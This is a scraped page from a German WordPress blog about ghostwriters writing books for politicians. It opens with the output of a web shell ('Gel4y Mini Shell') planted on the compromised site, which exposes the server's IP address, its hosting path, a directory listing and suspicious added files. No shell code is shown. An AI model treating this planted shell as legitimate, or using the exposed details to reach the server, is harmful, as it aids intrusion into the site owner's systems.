Gel4y Mini Shell

PHP Version : 8.0.30
+File +Directory
  • Server : autorenrechtsblog.de (/3.143.9.115)
  • Path: ~/mnt/web015/d2/28/511469628/htdocs/ghostwriterblog.net/autorenrechtsblog.de/
    Name Size Permission Action
    wp-admin N/A drwxrwxrwx
    wp-content N/A drwxrwxrwx
    wp-includes N/A drwxrwxrwx
    .htaccess 0.199KB -r--r--r--
    .user.ini 0.002KB -rw-r-----
    access.log 0.081KB -rw-r-----
    index.php 7.342KB -r--r--r--
    index.php1 0.396KB -rwxrwxrwx
    license.txt 19.448KB -rw-r--r--
    liesmich.html 8.428KB -rw-r--r--
    readme.html 7.229KB -rw-r--r--
    robots.txt 1.821KB -rw-r-----
    ss.php 13.495KB -rw-r-----
    uxo.txt 0.001KB -rw-r-----
    wp-aa.php 7.638KB -rw-r-----
    wp-activate.php 7.036KB -rw-r--r--
    wp-blog-header.php 0.343KB -rwxrwxrwx
    wp-comments-post.php 2.283KB -rw-r--r--
    wp-config-sample.php 2.942KB -rw-r--r--
    wp-config.php 3.764KB -rw-r--r--
    wp-cron.php 5.931KB -rw-r--r--
    wp-links-opml.php 2.443KB -rw-r--r--
    wp-load.php 4.279KB -rw-r--r--
    wp-login.php 48.773KB -rw-r--r--
    wp-mail.php 8.341KB -rw-r--r--
    wp-opml.php 59.478KB -rw-r-----
    wp-settings.php 25.199KB -rw-r--r--
    wp-signup.php 33.545KB -rw-r--r--
    wp-trackback.php 4.774KB -rw-r--r--
    xmlrpc.php 3.162KB -rw-r--r--
    Copyright © 2021 - Powered By Indonesian Darknet
    Ghostwriter für Politiker - autorenrechtsblog.de

    Ghostwriter für Politiker

    Auch wenn der Name auf dem Cover steht: Oft schreiben Politiker:innen ihre Bücher nicht selbst – denn nicht jede:r kann es oder hat die nötige Zeit dazu. Dafür gibt es Ghostwriter. Doch wie arbeiten sie?

    Ghostwriter übernehmen oft das Schreiben


    Baerbock hatte sich selbst am Donnerstagabend bei „Brigitte live“ gegen die Vorwürfe verteidigt. „Ich habe ein Buch geschrieben, in dem ich deutlich machen wollte, wer ich bin, was mich antreibt und was ich verändern möchte.“ Sie habe „viele Gespräche geführt und auch Ideen von anderen sind mit eingeflossen“, fügte die Kanzlerkandidatin hinzu. Sie habe deutlich gemacht, dass sie die öffentlichen Quellen nehme, die es gebe. Aber sie habe kein Sachbuch, keine wissenschaftliche Arbeit geschrieben. Deswegen gebe es auch keine Fußnoten.

    Viele Prominente, Politiker:innen oder Wirtschaftsbosse veröffentlichen gerne Bücher über sich, ihre Gedanken, Weltsicht und erlebtes. Doch meistens haben diese ihre Werke nicht von Anfang bis Ende selbst verfasst. Das übernehmen oft Ghostwriter.

    Abonnieren
    Benachrichtige mich bei
    guest
    1 Kommentar
    Oldest
    Newest Most Voted
    Inline Feedbacks
    View all comments
    Martin
    Martin
    2 Jahre zuvor

    sadf